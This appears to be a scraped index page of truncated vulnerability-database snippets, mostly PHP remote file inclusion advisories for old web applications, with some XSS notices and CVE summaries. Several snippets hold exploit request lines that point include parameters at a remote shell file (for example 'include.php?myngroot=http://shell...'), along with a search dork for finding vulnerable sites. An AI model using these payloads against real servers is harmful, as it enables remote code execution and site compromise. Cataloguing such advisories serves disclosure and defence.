PHP-CON 1.3 (include.php) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ============================================================= PHP-CON 1.3 include.php Remote File Inclusion Vulnerability ============================================================= PHP-CON v1.3 include.phpRemote File Inclusion...

helplink010-rfi.txt

Helplink 0.1.0 show.php file Remote File Inclusion Vulnerability D.S : http://sourceforge.net/projects/helplink/ V.C ================================show.php================================= 01 : ========================================================================= POC : /show.php?file=Ev!L C...

helplink 0.1.0 (show.php file) Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ================================================================== helplink 0.1.0 show.php file Remote File Inclusion Vulnerability ================================================================== Helplink 0.1.0 show.php file Remote File...

helplink 0.1.0 - show.php Remote File Inclusion

helplink 0.1.0 - show.php Remote File Inclusion Helplink 0.1.0 show.php file Remote File Inclusion Vulnerability D.S : http://sourceforge.net/projects/helplink/ V.C ================================show.php================================= 01 :...

Unfixed XSS vulnerability at www.raiden-clan.com

Security researcher Narcoticxs, has submitted on 31/08/2007 a cross-site-scripting XSS vulnerability affecting www.raiden-clan.com, which at the time of submission ranked 9833827 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 31/08/2007. It is...

Unfixed XSS vulnerability at www.netzwerk-wirtschaft.de

Security researcher Narcoticxs, has submitted on 30/08/2007 a cross-site-scripting XSS vulnerability affecting www.netzwerk-wirtschaft.de, which at the time of submission ranked 0 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 30/08/2007. It i...

SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability

No description provided by source. SomeryC = v0.2.4 Remote File Include Vendor: http://someryc.mostpopularcomic.com download http://someryc.mostpopularcomic.com/sC024.zip found by: Katatafish [email protected] d0rk: "powered by someryc" vuln-code/admin/system/include.php: if $start...

Remote file inclusion

PHP remote file inclusion vulnerability in include.php in PHPCentral Login 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the SERVERDOCUMENTROOT parameter. NOTE: a third party disputes this vulnerability because of the special nature of the SERVER superglobal array...

phpcentral-rfi.txt

PHPCentral Login Script Remote Command Execution Vulnerability ----------------------------------------------------------------------- Script : PHPCentral Login Script Version : 1.0 Site : http://www.phpcentral.org/scripts.php Founder : Rizgar Contact : [email protected] and irc.gigachat.net...

PHPCentral Login Script Remote Command Execution Vulnerability

PHPCentral Login Script Remote Command Execution Vulnerability ----------------------------------------------------------------------- Script : PHPCentral Login Script Version : 1.0 Site : http://www.phpcentral.org/scripts.php Founder : Rizgar Contact : [email protected] and irc.gigachat.net...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in Sun Board 1.00.00 Alpha allow remote attackers to execute arbitrary PHP code via a URL in 1 the sunPath parameter to include.php or 2 the dir parameter to skin/board/default/doctype.php...

Sun Board 1.00.00 alpha - Remote File Inclusion

Sun Board 1.00.00 Alpha Multiple Remote File Inclusion Vulnerabilities D.Script : http://mesh.dl.sourceforge.net/sourceforge/sunboard/sunboard.zip V.Code : require $sunPath.'config.php'; requireonce $sunPath.'dbms/'.$dbtype.'.php'; In : /include.php Exploits : /include.php?sunPath=Shell.txt? V.Co...

MyNewsGroups Include.PHP远程文件包含漏洞

MyNewsGroups是一款基于PHP的WEB应用程序。 MyNewsGroups不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'include'脚本对用户提交的'myngroot'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 MyNewsGroups 0.6 目前没有解决方案提供： http://mynewsgroups.sourceforge.net/ http://www.example.com/include.php?myngroot=http://shell...

CVE-2007-2325

PHP remote file inclusion vulnerability in include.php in MyNewsGroups : allows remote attackers to execute arbitrary PHP code via a URL in the myngroot parameter...

MyNewsGroups >> RFI in include.php

Author: Carlos Sanchez,[email protected] BY : www.hackerz.ir users, ali & saeid exploit : include.php?myngroot=http://shell...

PHP-Generics _App_Relative_Path远程文件包含漏洞

PHP-Generics是一款基于PHP的WEB应用程序。 PHP-Generics不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是多个脚本对用户提交的'APPRELATIVEPATH'参数缺少过滤，指定远程服务器上的文件作为包含参数，可导致以WEB权限执行任意命令。 Mutant Mutant 0.9.2 Mutant Mutant 0.9.1 目前没有解决方案提供： http://sourceforge.net/projects/php-generics...

phpgenerics-rfi.txt

-------------------------------------------------------- php-generics 1.0 Remote File Inclusion Vulnerabilities -------------------------------------------------------- Software: php-generics 1.0Beta Vendor: http://ie.archive.ubuntu.com/sourceforge/p/ph/php-generics/php-generics-1.0.0-beta.zip...

PHP-Generics 1.0.0 beta Multiple Remote File Inclusion Vulnerabilities

No description provided by source. -------------------------------------------------------- php-generics 1.0 Remote File Inclusion Vulnerabilities -------------------------------------------------------- Software: php-generics 1.0Beta Vendor:...

PHP-Generics 1.0.0 beta Multiple Remote File Inclusion Vulnerabilities

Exploit for unknown platform in category web applications ====================================================================== PHP-Generics 1.0.0 beta Multiple Remote File Inclusion Vulnerabilities ======================================================================...

CVE-2006-7115

SQL injection vulnerability in PHPKit 1.6.1 RC2 allows remote attackers to inject arbitrary SQL commands via the catid parameter to include.php when the path parameter is set to faq/faq.php, and other unspecified vectors involving guestbook/print.php...